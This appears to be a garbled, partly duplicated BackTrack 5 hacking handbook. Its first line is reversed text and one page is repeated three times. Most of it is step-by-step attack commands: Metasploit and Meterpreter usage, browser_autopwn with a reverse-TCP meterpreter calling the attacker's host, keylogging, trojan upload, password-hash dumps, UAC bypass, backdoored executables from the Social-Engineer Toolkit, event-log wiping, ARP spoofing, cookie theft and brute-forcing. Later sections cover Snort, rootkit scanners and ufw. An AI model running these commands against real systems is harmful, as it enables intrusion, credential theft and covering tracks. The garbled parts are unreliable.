    . llehs:. noisses : i- noisses

    . trats_nacsyek:. pmud_nacsyek:. pots_nacsyek:

    . :led sp:

    . gol : varaelc3556 3536 llik :

  • 98

    1. back:
       msf auxiliary(ms09_001_write) > back
       msf >
    2. check: tests whether the target is vulnerable without running the exploit.
       msf exploit(ms04_045_wins) > show options
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  192.168.1.114    yes       The target address
       RPORT  42               yes       The target port
       Exploit target:
       Id  Name
       --  ----
       0   Windows 2000 English
       msf exploit(ms04_045_wins) > check
       [-] Check failed: The connection was refused by the remote host (192.168.1.114:42)
    3. connect: a small netcat / telnet-like client.
       msf > connect 192.168.1.1 23
       [*] Connected to 192.168.1.1:23!
       DD-WRT v24 std (c) 2008 NewMedia-NET GmbH
       Release: 07/27/08 (SVN revision: 10011)
       -s (SSL):
       msf > connect -s www.metasploit.com:443
       [*] Connected to www.metasploit.com:443
       GET / HTTP/1.0
       HTTP/1.1 302 Found
       Date: Sat, 25 Jul 2009 05:03:42 GMT

  • 99

       Server: Apache/2.2.11
       Location: http://www.metasploit.org/
    4. exploit / run: exploit runs an exploit module, run runs an auxiliary module.
       msf auxiliary(ms09_001_write) > run
       Attempting to crash the remote host...
       datalenlow=65535 dataoffset=65535 fillersize=72
       rescue
       datalenlow=55535 dataoffset=65535 fillersize=72
       rescue
       datalenlow=45535 dataoffset=65535 fillersize=72
       rescue
       datalenlow=35535 dataoffset=65535 fillersize=72
       rescue
       datalenlow=25535 dataoffset=65535 fillersize=72
       rescue
       ...snip...
    5. irb: interactive Ruby shell inside the framework.
       msf > irb
       [*] Starting IRB shell...
       >> puts "Hello, metasploit!"
       Hello, metasploit!
       >> Framework::Version
       => "3.3-dev"
       >> framework.modules.keys.length
       => 744
    6. jobs: background jobs in msf:

  • 100

    7. jobs -K: kill all jobs; -k: kill a job; -i: job info.
       load: loads a plugin.
       msf > load
       Usage: load [var=val var=val ...]
       msf > load pcap_log
       [*] Successfully loaded plugin: pcap_log
    8. unload:
       msf > load pcap_log
       [*] Successfully loaded plugin: pcap_log
       msf > unload pcap_log
       Unloading plugin pcap_log...unloaded.
    9. route (meterpreter route -h):
       add [subnet] [netmask] [gateway]
       delete [subnet] [netmask] [gateway]
       list
       pivoting.
       msf exploit(ms08_067_netapi) > route
       Usage: route [add/remove/get/flush/print] subnet netmask [comm/sid]
       Route traffic destined to a given subnet through a supplied session.
       The default comm is Local.

  • 101

       msf exploit(ms08_067_netapi) > route add 192.168.1.0 255.255.255.0 2
       msf exploit(ms08_067_netapi) > route print
       Active Routing Table
       ====================
       Subnet       Netmask        Gateway
       ------       -------        -------
       192.168.1.0  255.255.255.0  Session 2
    10. info: author and licensing information, vulnerability references (ie: CVE, BID, etc).
       msf > info dos/windows/smb/ms09_001_write
       Name: Microsoft SRV.SYS WriteAndX Invalid DataOffset
       Version: 6890
       License: Metasploit Framework License (BSD)
       Provided by: j.v.vallejo
    11. set / unset: module and Payload options.
       msf auxiliary(ms09_001_write) > set RHOST 192.168.1.1
       RHOST => 192.168.1.1
       msf auxiliary(ms09_001_write) > show options
       Module options:
       Name   Current Setting  Required  Description
       ----   ---------------  --------  -----------
       RHOST  192.168.1.1      yes       The target address
       RPORT  445              yes       Set the SMB service port
       Unset:
       msf > set RHOSTS 192.168.1.0/24
       RHOSTS => 192.168.1.0/24
       msf > set THREADS 50

  • 102

       THREADS => 50
       msf > set
       Global
       ======
       Name     Value
       ----     -----
       RHOSTS   192.168.1.0/24
       THREADS  50
       msf > unset THREADS
       Unsetting THREADS...
       msf > unset all
       Flushing datastore...
       msf > set
       Global
       ======
       No entries in data store.
    12. sessions: meterpreter, VNC, shells...
       sessions -i:
       msf exploit(3proxy) > sessions -i 1
       [*] Starting interaction with 1...
    13. search:
       msf > search ms09-001
       [*] Searching loaded modules for pattern 'ms09-001'...
       Auxiliary
       =========

  • 103

       Name                            Description
       ----                            -----------
       dos/windows/smb/ms09_001_write  Microsoft SRV.SYS WriteAndX Invalid DataOffset
    14. show: auxiliary, exploit, ...
       msf > show auxiliary
       Auxiliary
       =========
       Name                              Description
       ----                              -----------
       admin/backupexec/dump             Veritas Backup Exec Windows Remote File Access
       admin/backupexec/registry         Veritas Backup Exec Server Registry Access
       admin/cisco/ios_http_auth_bypass  Cisco IOS HTTP Unauthorized Administrative Access
       ...snip...
       msf > show exploits
       show encoders
       msf > show payloads
       show nops
       show options
       show advanced
       show targets
    15. ps:
       meterpreter > ps

  • 104

    16. migrate: move into another process (notepad).
       ps, notepad:
       pid=1540
       migrate 1540
    17. ls:
       meterpreter > ls
    18. download:
       meterpreter > download c:\\boot.ini
       [*] downloading: c:\boot.ini -> c:\boot.ini
       [*] downloaded : c:\boot.ini -> c:\boot.ini/boot.ini
    19. upload: evil-trojan.
       meterpreter > upload evil_trojan.exe c:\\windows\\system32
    20. ipconfig:
    21. execute: command.
       execute -f cmd.exe -i -H
    22. hashdump: (user account)
       meterpreter > run post/windows/gather/hashdump
       [*] Obtaining the user list and keys...
       [*] Decrypting user keys...
       [*] Dumping password hashes...
       Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1

    104

    16.migrate: notpad ) (.

    Ps notpad .:

    pid=1540migrate to 1540

    17.ls: .

    meterpreter > ls18.download:

    :meterpreter > download c:\\boot.ini[*] downloading: c:\boot.ini -> c:\boot.ini[*] : c:\boot.ini ->c:\boot.ini/boot.ini

    19.upload:evil-trojan .

    meterpreter > upload evil_trojan.exe c:\\windows\\system3220.ipconfig:

    .21.execute:command.

    execute -f cmd.exe -i -H22.hashdump: )user account( .

    meterpreter > run post/windows/gather/hashdump[*]Obtaining the user list and keys...[*]Decrypting user keys...[*]Dumping password hashes...

    Administrator:500:b512c1f3a8c0e7241aa818381e4e751b :1891f4775f676d4d10c09c1

    104

    16.migrate: notpad ) (.

    Ps notpad .:

    pid=1540migrate to 1540

    17.ls: .

    meterpreter > ls18.download:

    :meterpreter > download c:\\boot.ini[*] downloading: c:\boot.ini -> c:\boot.ini[*] : c:\boot.ini ->c:\boot.ini/boot.ini

    19.upload:evil-trojan .

    meterpreter > upload evil_trojan.exe c:\\windows\\system3220.ipconfig:

    .21.execute:command.

    execute -f cmd.exe -i -H22.hashdump: )user account( .

    meterpreter > run post/windows/gather/hashdump[*]Obtaining the user list and keys...[*]Decrypting user keys...[*]Dumping password hashes...

    Administrator:500:b512c1f3a8c0e7241aa818381e4e751b :1891f4775f676d4d10c09c1

  • 105

    225a5c0a3:::dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbda e13ed5abd30ac94ddeb3cf52d:::Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe 0d16ae931b73c59d7e0c089c0:::

    Metasploitable MySQL: a word-list attack on the MySQL service with metasploit.

    1) start msfconsole:

    msfconsole

    2) search for the MySQL modules:

    search MySQL

    3) select the MySQL brute-force (login scanner) module:

    use auxiliary/scanner/mysql/mysql_login

    4) show the module options:

    show options

    5) set the target:

    set RHOSTS 192.168.10.111

    6) set the user word-list:

    set user_file /root/Desktop/usernames.txt

    7) set the password word-list:

    set pass_file /root/Desktop/passwords.txt

    8) run the module:

    exploit

    The result lists the valid user + password combinations that were found.

    Metasploitable Postgresql: the same procedure as the MySQL one in metasploit:

    set RHOSTS 192.168.10.111
    set user_file /opt/metasploit/msf3/data/wordlists/postgres_default_user.txt
    set pass_file /opt/metasploit/msf3/data/wordlists/postgres_default_user.txt
    exploit

    Implementing the browser_autopwn module:

    1) start msfconsole:

    msfconsole

    2) search for the module:

    search autopwn

    3) select it:

    use auxiliary/server/browser_autopwn

    4) set the payload and show the options:

    set payload windows/meterpreter/reverse_tcp
    show options

    5) set LHOST to our own ip address:

    set LHOST 192.168.10.109

    6) set the URI path:

    set URIPATH "filetypes"

    7) run it:

    exploit

    Metasploit starts the exploit at the IP address http://[Provided IP Address]:8080 (the LHOST address).

    Once a session is open:

    sessions -i 1
    help
    keyscan_start
    keyscan_dump

    1: Metasploitable Tomcat. 2: Metasploitable PDF.

    3: Wifi Hacking: Karmetasploit In Action

    Sources:
    http://www.offensive-security.com/me...loit_In_Action
    http://www.backtrack-linux.org/forum...hp?t=21492#top
    www.hackingdna.com
    http://wirelessdefence.org/Contents/karmetasploit.htm
    https://www.google.com/#q=tutorial+metasploit
    http://www.offensive-security.com/metasploit-unleashed/Attack_Analysis
    http://searchsecurity.techtarget.in/tip/BackTrack-5-tutorial-Part-I-Information-gathering-and-VA-tools
    http://www.offensive-security.com/metasploit-unleashed/Msfconsole_Commands
    http://www.offensive-security.com/metasploit-unleashed/Meterpreter_Basics
    http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient
    http://sectools.org/tag/sploits/

    Metasploitable Tomcat:
    http://www.rapid7.com/db/modules/exp...cat_mgr_deploy
    http://www.rapid7.com/db/modules/aux...mcat_mgr_login
    http://www.securitygeeks.net/2013/05...he-tomcat.html
    http://www.offensive-security.com/me...n_HTTP_Modules
    www.youtube.com/watch?v=o8_qLxPW--s
    www.youtube.com/watch?v=0-ue2_q_9oU

    Metasploitable PDF:
    http://www.offensive-security.com/me..._Side_Exploits
    http://www.offensive-security.com/me...rting_Exploits
    http://www.exploit-db.com/exploits/14681/
    http://blog.g0tmi1k.com/2011/03/vide...dobe-pdfs.html
    https://community.rapid7.com/thread/2742
    http://www.rapid7.com/db/modules/exp...f_embedded_exe

    Karmetasploit In Action:
    http://www.offensive-security.com/me...loit_In_Action
    http://www.backtrack-linux.org/forum...hp?t=21492#top
    http://wirelessdefence.org/Contents/karmetasploit.htm

    Web exploitation tools:
    http://www.blackhatlibrary.net/Category:Web_exploitation
    http://www.dotslashbacktrack.com/web-exploitation-tools.html
    http://www.aldeid.com/wiki/Websecurify
    http://www.aldeid.com/wiki/W3AF
    http://searchsecurity.techtarget.in/tip/A-Web-exploit-toolkit-reference-guide-for-BackTrack-5
    http://www.aldeid.com/wiki/Category:Backtrack/GUI/Exploitation-Tools/Web-Exploitation-Tools

    Privilege Escalation

    Using impersonation tokens:

    Start from an open meterpreter session (see chapter 5).

    1) sessions -i 1

    2) in meterpreter: use incognito

    3) help

    4) list the available tokens:

    list_tokens -u

    5) impersonate a token:

    impersonate_token \\test-pc\willie

    Syntax: impersonate_token [name of the account to impersonate]

    Local privilege escalation attack:

    1. from the meterpreter session:

    2. getsystem -h
    getsystem

    On Windows 7, UAC (User Account Control) has to be bypassed first:

    run post/windows/escalate/bypassuac

    Mastering the Social-Engineer Toolkit (SET): the SET framework.

    1) go to the set directory:

    cd /pentest/exploits/set

    or from the menu:

    Applications | BackTrack | Exploitation Tools | Social Engineering Tools | Social Engineering Toolkit | set.

    2) run it:

    ./set

    3) answer y and press Enter.

    4) the set menu:

    Social-Engineering Attacks
    Fast-Track Penetration Testing
    Third Party Modules
    Update the Metasploit Framework
    Update the Social-Engineer Toolkit
    Update SET configuration
    Help, Credits, and About
    Exit the Social-Engineer Toolkit

    1) choose "Social-Engineering Attacks" (option 1).

    2) choose "Create a Payload and Listener" (option 4).

    3) ip for the reverse connection: 192.168.10.109

    4) payload: Windows Reverse_TCP Meterpreter

    5) Encoding bypass: 2

    6) 16: Backdoored Executable (BEST).

    7) the handler (the metasploit exploit handler).

    Collecting victims' data: in the open session:

    keyscan_start

    keyscan_dump

    Cleaning up the tracks: clearing the Windows event logs from the session.

    sessions -i 1

    irb

    Open the event logs:

    log = client.sys.eventlog.open('system')
    log = client.sys.eventlog.open('security')
    log = client.sys.eventlog.open('application')
    log = client.sys.eventlog.open('directory service')
    log = client.sys.eventlog.open('dns server')
    log = client.sys.eventlog.open('file replication service')

    and clear the opened log:

    log.clear

    Man-in-the-middle attack (MITM):

    1) start ettercap in graphical mode:

    ettercap -G

    2) Sniff | Unified sniffing

    3) choose the interface.

    4) Hosts | Scan for hosts

    5) Hosts | Hosts list

    Select the target 192.168.10.112 and click Add to Target 1.

    6) Start | Start sniffing

    7) Mitm | Arp poisoning (arp)

    8) Sniff remote connections

    9)

    10) Start | Stop sniffing

    URL traffic manipulation (arp, arpspoof): the traffic is forwarded with ip-tables.

    Enable ip forwarding and check the value:

    sudo echo 1 >> /proc/sys/net/ipv4/ip_forward
    cat /proc/sys/net/ipv4/ip_forward

    Target: win7 with ip 192.168.10.115.

    -i (interface): wlan = wireless, eth = Ethernet, lo = loopback.

    -t (target):

    sudo arpspoof -i wlan0 -t 192.168.10.115 192.168.10.1

    Syntax: arpspoof -i [interface] -t [target IP address] [destination IP address]

    The other direction, with the gateway ip 192.168.10.1 as the target and our ip 192.168.10.110:

    sudo arpspoof -i wlan0 -t 192.168.10.1 192.168.10.110

    Port redirection: port redirection / port forwarding / port mapping, here from port 80 to 8080.

    sudo echo 1 >> /proc/sys/net/ipv4/ip_forward

    arpspoof with only the gateway ip (192.168.10.1):

    sudo arpspoof -i wlan0 192.168.10.1

    Syntax: arpspoof -i [interface] [destination IP address]

    Our ip: 192.168.10.110.

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    The redirected traffic can then be sniffed.

    Accessing an e-mail by stealing cookies:

    Tools: Ettercap, SSLstrip, URLstrip, Easy-Creds.

    1) Creds: easy-creds.

    2) run it:

    ./easy-creds.sh

    choose 2.

    3) 3 Oneway ARP Poisoning.

    4) interface: wlan0

    5) path: /root/Easy-Creds or /pentest/sniffers/easy-creds

    6) "Do you have a populated file of victims to use": n

    7) gateway ip: 192.168.10.1

    8) "Would you like to include a sidejacking attack": n

    9)

    10) ettercap and easy-creds show the captured data.

    Sources:
    http://en.wikipedia.org/wiki/Man-in-...e_of_an_attack
    http://openmaniak.com/ettercap_filter.php
    cain & abel:
    http://www.irongeek.com/i.php?page=v...-arp-poisoning
    cain & abel:
    http://www.hacking-tutorial.com/hack...middle-attack/
    http://www.chmag.in/article/jun2012/mitm-ettercap
    http://www.tech-juice.org/2011/06/20...with-ettercap/
    http://www.offensive-security.com/metasploit-unleashed/Event_Log_Management
    https://pypi.python.org/pypi/sslstrip/0.9.2
    http://www.backtrack-linux.org/forums/showthread.php?t=20272
    http://seclist.us/2013/01/update-easy-creeds-v-3-7-3-linux-bash-script-for-mitm-attacks.html
    www.youtube.com/watch?v=RfHfmeaYcy0
    www.youtube.com/watch?v=rw_b__wiSWM
    www.youtube.com/watch?v=EMTzBfbU808

    Password Cracking

    Online Password and HTTP Attacks:

    Hydra (THC-Hydra) supports FTP, HTTP, HTTPS, MS, MySql, VNC, Cisco, ...

    1) open hydra (hydra-gtk):

    Applications | BackTrack | Privilege Escalation | Password Attacks | Online Attacks | hydra-gtk

    2) word-lists:

    /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/names/nameslist.txt
    /pentest/web/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/john.txt

    3) target tab: target ip 192.168.10.111

    4) number of tasks.

    5) start.

    Gaining router access:

    1. brute-force with medusa:

    Applications | BackTrack | Privilege Escalation | Password Attacks | Online Attacks | medusa

    2. command:

    medusa -M http -h 192.168.10.1 -u admin -P /pentest/passwords/wordlists/darkc0de.lst -e ns -n 80 -F

    -M: module (http). -h: target ip. -u: user (admin). -P: password list. -e: ns (also try an empty password and the username as password). -F: stop after the first valid account. -n: port.

    Medusa supports the following modules:

    AFP, CVS, FTP, HTTP, IMAP, MS SQL, MySQL, NetWare, NNTP, POP3, Postgresql, REXEC, RLOGIN, RSH, SMBNT, SMTP AUTH, SMTP VRFY, SNMP, SSHv2, Subversion, Telnet, VMware authentication, VNC, www

    Password profiling:

    1) start metasploit:

    msfconsole

    2) search for the email collector:

    search email collector

    3) select the module:

    use auxiliary/gather/search_email_collector

    4) show the options:

    show options

    5) set the domain:

    set domain fromwilliesperspective.com

    6) set the output file:

    set outfile /root/Desktop/fromwillie.txt

    7) run it:

    run

    8) the result is in the output file.

    Cracking a Windows password using John the Ripper:

    (Physical access attack.) Boot from USB or CD/DVD-ROM, take the hashes from the SAM and brute-force them with john.

    1) fdisk -l

    2) mount /dev/sda1 /target/

    3) go to the SAM directory: cd /target/windows/system32/config

    4) ls -al

    5) samdump2 system SAM > /root/hashes/hash.txt

    6) go to john the ripper: cd /pentest/passwords/jtr

    7) ./john /root/hashes/hash.txt

    8) NTFS: ./john /root/hashes/hash.txt -f:nt

    Using dictionary attacks:

    1) apt-get update

    2) apt-get install crunch

    3) /pentest/passwords/crunch

    4) syntax: crunch [minimum length] [maximum length] [character set] [options]

    5) options: -l: treat @ , % , ^ as literal characters. -b: maximum file size (GB, MB, KB). -o: output file. Example (lengths 8 to 10):

    /pentest/passwords/crunch/crunch 8 10 ABCDEFGabcdefg0123456789 -o /root/Desktop/generatedCrunch.txt

    6) view the result: nano /root/Desktop/generatedCrunch.txt

    SUCrack (physical access attacks):

    --help: shows the options.

    -s: delay between attempts in seconds (default 3). -l:

    -a: use ANSI escape codes. -w: number of worker threads (multithreaded).

    1. with a word-list (from crunch, or rockyou):

    sucrack /pentest/passwords/wordlists/rockyou.txt

    2. with 2 threads, a 6 second delay and ANSI output:

    sucrack -w 2 -s 6 -a /pentest/passwords/wordlists/rockyou.txt

    Sources:
    http://www.remote-exploit.org/articles/misc_research__amp_code/index.html
    http://www.securityfocus.com/tools/category/11
    http://www.breaknenter.org/
    http://www.breaknenter.org/projects/inception/
    Using rainbow tables:
    www.youtube.com/watch?v=yVlX8lh967M
    www.youtube.com/watch?v=X1krdBR_RRo
    http://null-byte.wonderhowto.com/how-to/rainbow-tables-create-use-them-crack-passwords-0131470/
    http://renderlab.net/projects/WPA-tables/
    http://xiaopan.co/forums/threads/wpa-wpa2-psk-rainbow-tables-33gb.440/
    Using ATI Stream:
    www.youtube.com/watch?v=TeqN8BM9A30
    http://www.backtrack-linux.org/forums/showthread.php?t=41531
    http://www.offensive-security.com/backtrack/cuda-and-ati-stream-backtrack/
    https://sites.google.com/site/nozyczek/home/wardriving/how-to-install-pyrit-with-ati-cal-support-under-backtrack-5-r1-gnome-64bit
    http://www.backtrack-linux.org/wiki/index.php/Install_OpenCL
    Using NVIDIA Compute Unified Device Architecture (CUDA):
    www.offensive-security.com/documentation/backtrack-4-cuda-guide.pdf
    www.backtrack-linux.org/documents/BACKTRACK_CUDA_v2.0.pdf
    http://www.backtrack-linux.org/wiki/index.php/CUDA_On_BackTrack
    https://www.google.com/#q=+NVIDIA+Compute+Unified+Device+Architecture+on+backtrack+5
    Password profiling:
    http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_
    http://www.pcmag.com/article2/0,2817,2389089,00.asp
    https://bechtsoudis.com/hacking/password-profiling-mask-attacks/
    http://my.safaribooksonline.com/book/-/9781849517386/9dot-password-cracking/ch09s05_html

    BackTrack Forensics (Snort)

    Snort is an intrusion detection system (IDS).

    1) Snort rules: register and download the rule set:

    https://www.snort.org/signup
    http://snort.org/start/rules

    2) install the rules.

    3) options: -i: interface. -c: configuration file (/etc/snort/snort.conf). -v: TCP/IP "sniffer mode". -q: quiet mode. Run snort:

    snort -q -v -i eth1 -c /etc/snort/snort.conf

    4) ctrl+x stops snort.

    Configuring snort:

    1. locate snort.conf

    2. nano /etc/snort/snort.conf

    3. find the line "var HOME_NET any" and set it to the network to protect:

    a single ip: var HOME_NET 192.168.10.10
    a subnet: var HOME_NET 192.168.10.0/24
    several subnets: var HOME_NET 192.168.10.0/24,10.0.2.0/24

    Here: var HOME_NET 192.168.10.0/24

    4. set EXTERNAL_NET:

    Lines starting with # are comments:

    #var EXTERNAL_NET any
    var EXTERNAL_NET !$HOME_NET

    Snort manual (pdf): www.snort.org/assets/166/snort_manual.pdf

    Recursive directory encryption/decryption: gpgdir encrypts (enc) and decrypts (dec) a whole directory with gpg.

    1) mkdir /sourcecode
    cd /sourcecode

    2) wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2

    3) wget http://cipherdyne.org/gpgdir/download/gpgdir-1.9.5.tar.bz2.asc

    4) verify the signature:

    gpg --import public_key
    gpg --verify gpgdir-1.9.5.tar.bz2.asc

    5) tar xfj gpgdir-1.9.5.tar.bz2
    cd gpgdir-1.9.5
    ./install.pl

    6) run gpgdir:

    gpgdir

    7) vi /root/.gpgdirrc

    set default_key to the id of your gpg key.

    Usage:

    1. mkdir /encrypted_directory

    2. put the files to encrypt in it.

    3. encrypt:

    gpgdir -e /encrypted_directory

    4. the files are now encrypted.

    5. decrypt:

    gpgdir -d /encrypted_directory

    Documentation: http://cipherdyne.org/gpgdir/docs/

    Scanning for signs of rootkits:

    chkrootkit:

    Applications | BackTrack | Forensics | Anti-Virus Forensics Tools | chkrootkit

    or from the terminal:

    cd /pentest/forensics/chkrootkit
    ./chkrootkit

    rkhunter:

    1. rkhunter (rootkit hunter).

    2. rkhunter --check

    chkrootkit options: -l: list the tests. -V: version. -h: help.

    rkhunter:

    1) rkhunter

    2) update the database: rkhunter --update

    3) list the tests (to skip some): rkhunter --list

    rkhunter --check --sk (--sk skips the key presses between sections)

    Recovering data from a problematic source:

    1) fatback, on a USB drive:

    fdisk -l (the USB drive is /dev/sdb1)

    2) mkdir /fatback
    mkdir /fatback/thumbdrivefiles

    3) cd /fatback

    4) Applications | BackTrack | Forensics | Forensic Carving Tools | fatback

    5) fatback options: -a: automatic (non-interactive) recovery. -o: output directory (/fatback/thumbdrivefiles).

    6) run it on /dev/sdb1:

    fatback /dev/sdb1 -o /fatback/thumbdrivefiles -a

    ls
    cd thumbdrivefiles
    ls

    The recovered files are in thumbdrivefiles.

    Source: http://www.forensicswiki.org/wiki/File_Carving

    Retrieving a Windows password: Ophcrack.

    1) download the tables from http://ophcrack.sourceforge.net/tables.php.

    2) choose the table.

    3) extract the ophcrack tables.

    4) install.

    5) open it:

    Applications | BackTrack | Privilege Escalation | Password Attacks | Offline Attacks | Ophcrack-GUI

    6) Load the SAM.

    7) Crack.

    Resetting a Windows password: chntpw.

    1) the SAM is in C:\Windows\System32\Config.

    fdisk -l
    mount /dev/sda1 /target/

    2) SAM: cd /target/windows/system32/config

    3) ls -al

    4) cd /pentest/passwords/chntpw

    5) ./chntpw -i /target/windows/system32/config/SAM

    6) in the "What to Do?" area choose 1.

    7) 1.

    8) 1 (blank the password).

    Looking at the Windows registry entries: with chntpw.

    1) fdisk -l
    mount /dev/sda1 /target/

    2) SAM: cd /target/windows/system32/config

    3) ls -al

    4) cd /pentest/passwords/chntpw

    5) interactive mode: ./chntpw -i /target/windows/system32/config

    6) in the "What to Do?" area choose 9.

    7) ls

    8) cd

    Sources:
    http://indonetworksecurity.com/Network%20and%20website%20security/linux/page/4
    chntpw:
    http://www.wikihow.com/Change-a-Windows-User-Password-Using-Backtrack-4
    http://www.quali5.asia/2013/03/convert-guest-account-into.html
    http://securityxploded.com/backtrackregistry.php
    www.youtube.com/watch?v=G15vPnmQ3Gk
    www.youtube.com/watch?v=ukgJ-kgTjrc
    http://www3.nd.edu/~dpettifo/tutorials/chntpw.html
    ophcrack:
    www.youtube.com/watch?v=X1krdBR_RRo
    http://www.rmprepusb.com/tutorials/ophcrack
    www.youtube.com/watch?v=di3BIqq40bE
    fatback:
    http://indonetworksecurity.com/linux/tutorial-fatback-backtrack.htm
    www.youtube.com/watch?v=0TYLq2wTr00
    http://www.securitytube.net/video/4245
    chkrootkit:
    www.youtube.com/watch?v=Zqs0CXfqVfU
    http://hackingdna.com/Description.aspx?ItemHeaderId=3179E185-4F7A-4568-8DD4-B563C5F050F2
    http://fuzzexp.org/the-backtrack-forensics-the-howto.html
    http://sourceforge.net/apps/trac/rkhunter/wiki/SPRKH
    http://hackingbuzz.com/hunt-rootkits-with-rootkit-hunter-tool/
    snort:
    http://www.thegeekstuff.com/2010/08/snort-tutorial/
    http://security.koenig-solutions.com/1/post/2013/02/configuring-snort-in-backtrack-5-r3.html
    http://openmaniak.com/snort_tutorial_snort.php
    http://www.linuxuser.co.uk/tutorials/protect-your-network-with-snort
    gpgdir:
    http://archive09.linux.com/feature/132999
    http://kerry-linux.ie/wee/cloud/wee-owncloud.php

    Port Knocking:
    http://cipherdyne.org/blog/categories/port-knocking-and-spa.html

    Appendix One

    Create or extract [tar, zip, tar.bzip2, tar.gz] files:

    tar (create): $ tar -cvf filename.tar filename

    tar (extract): $ tar -xvf filename.tar

    tar.gz: tar -xvzf filename.tar.gz

    zip: zip filename.zip [files]

    unzip: unzip file.zip -d destination_folder

    gz: $ gunzip file.gz

    $ gzip -d file.gz

    tar.bz2: bzip2 -dc file.tar.bz2 | tar xvf -

    Graphical alternative: xarchiver (install from synaptic).

    UFW: the Uncomplicated Firewall of ubuntu 10.04.

    Enable UFW:

    sudo ufw enable

    Disable UFW:

    sudo ufw disable

    Detailed status:

    sudo ufw status verbose

    Output:

    root@bt:~# ufw status verbose
    Status: active
    Logging: on (low)
    Default: deny (incoming), allow (outgoing)
    New profiles: skip

    Rule list:

    sudo ufw status

    Output:

    sudo ufw status
    Firewall loaded

    To       Action  From
    22:tcp   DENY    192.168.0.1
    22:udp   DENY    192.168.0.1
    22:tcp   DENY    192.168.0.7
    22:udp   DENY    192.168.0.7
    22:tcp   ALLOW   192.168.0.0/24
    22:udp   ALLOW   192.168.0.0/24

    UFW rules: allow or deny by port and protocol.

    sudo ufw allow [port]/[protocol]

    Example 1:

    sudo ufw allow 53
    sudo ufw allow 53/tcp
    sudo ufw allow 53/udp

    sudo ufw deny [port]/[protocol]

    Example 2:

    sudo ufw deny 53/udp
    sudo ufw deny 53

    sudo ufw allow from [ip address]

    Example 3: allow an ip:

    sudo ufw allow from 207.46.232.182

    or a subnet:

    sudo ufw allow from 192.168.1.0/24

    sudo ufw allow from [ip address] to any port [port]

    Example 4: allow ip 192.168.0.4 on port 22:

    sudo ufw allow from 192.168.0.4 to any port 22

    sudo ufw allow from [ip address] to any port [port] proto [protocol]

    Example 5: allow ip 192.168.0.4 on port 22, tcp only:

    sudo ufw allow from 192.168.0.4 to any port 22 proto tcp

    Enable/Disable ping: edit /etc/ufw/before.rules:

    # ok icmp codes
    -A ufw-before-input -p icmp --icmp-type destination-unreachable -j ACCEPT
    -A ufw-before-input -p icmp --icmp-type source-quench -j ACCEPT
    -A ufw-before-input -p icmp --icmp-type time-exceeded -j ACCEPT
    -A ufw-before-input -p icmp --icmp-type parameter-problem -j ACCEPT
    -A ufw-before-input -p icmp --icmp-type echo-request -j ACCEPT

    To block ping, change ACCEPT to DROP:

    # ok icmp codes
    -A ufw-before-input -p icmp --icmp-type destination-unreachable -j DROP
    -A ufw-before-input -p icmp --icmp-type source-quench -j DROP
    -A ufw-before-input -p icmp --icmp-type time-exceeded -j DROP
    -A ufw-before-input -p icmp --icmp-type parameter-problem -j DROP
    -A ufw-before-input -p icmp --icmp-type echo-request -j DROP

    Deleting rules: list them numbered, then delete by number:

    sudo ufw status numbered

    sudo ufw delete 1

    Example 1: port 22 is to be denied for 192.168.0.3, 192.168.0.1 and 192.168.0.7:

    sudo ufw status

    (before:)
    Firewall loaded

    To       Action  From
    22:tcp   DENY    192.168.0.1
    22:udp   DENY    192.168.0.1
    22:tcp   DENY    192.168.0.7
    22:udp   DENY    192.168.0.7
    22:tcp   ALLOW   192.168.0.0/24

    (delete the allow rule:)
    sudo ufw delete allow from 192.168.0.0/24 to any port 22
    sudo ufw status
    Firewall loaded

    To       Action  From
    22:tcp   DENY    192.168.0.1
    22:udp   DENY    192.168.0.1
    22:tcp   DENY    192.168.0.7
    22:udp   DENY    192.168.0.7

    sudo ufw deny from 192.168.0.3 to any port 22
    sudo ufw allow from 192.168.0.0/24 to any port 22 proto tcp
    sudo ufw status
    Firewall loaded

    To       Action  From
    22:tcp   DENY    192.168.0.1
    22:udp   DENY    192.168.0.1
    22:tcp   DENY    192.168.0.7
    22:udp   DENY    192.168.0.7
    22:tcp   DENY    192.168.0.3
    22:udp   DENY    192.168.0.3
    22:tcp   ALLOW   192.168.0.0/24

    A rule can also be deleted by repeating it after delete:

    ufw deny 80/tcp
    sudo ufw delete deny 80/tcp

    Rules by service name: the names are listed in /etc/services:

    less /etc/services

    sudo ufw allow [service]
    sudo ufw allow ssh
    sudo ufw deny ssh

    Commands in BT5-R3:

    1) touch: creates an empty file.

    touch alimp5.html

    2) cat: shows the content of a file.

    3) echo: writes text.

    echo salaaam > alimp5.html

    4) cp: copies a file.

    cp alimp5.html /tmp/alimp5.html

    5) mv: moves (cuts) or renames a file.

    mv alimp5.html /root/alimp5.html
    mv alimp5.html jafar.html

    6) rm: removes a file.

    rm jafar.html

    7) ps aux: lists the processes.

    8) kill: kills a process by pid.

    kill 1580

    9) locate: finds a file by name.

    10) find: searches for a file.

    find /root -name index.html

    11) adduser: adds a user.

    adduser azimzadeh

    12) uname -a: shows the kernel and system information.

    13) ls -la: lists the files with details.

    14) passwd: changes a password.

    Show the users:

    cat /etc/passwd

    Installing packages:

    .deb: dpkg -i [location of the file].deb

    dpkg -i /root/Desktop/ali.deb

    .rpm: rpm -i [location of the file].rpm

    rpm -i /root/Desktop/ali.rpm

    .exe: wine [location of the file].exe

    wine /root/raidcall.exe

    Running .sh scripts (make them executable first, permission):

    sh alimp5.sh

    chmod 777 alimp5.sh

    ./alimp5.sh

    Sharing files between vmware / vbox machines over apache:

    1) start apache.

    2) put the file in /var/www

    3) find the ip with ifconfig

    4) open it over apache: 127.0.0.1/bt-vm.zip locally, or from the other machine:

    http://192.168.1.3/bt-vm.zip

    If the download is blocked, check the Comodo firewall.

    DHCP_Server&Client:

    In synaptic install the dhcp3 packages: dhcp3-common, dhcp3-client, dhcp3-server.

    Or download them from www.pkgs.org (ubuntu 10.04):

    dhcp3-client_3.1.3-2ubuntu3_i386.deb
    dhcp3-common_3.1.3-2ubuntu3_i386.deb
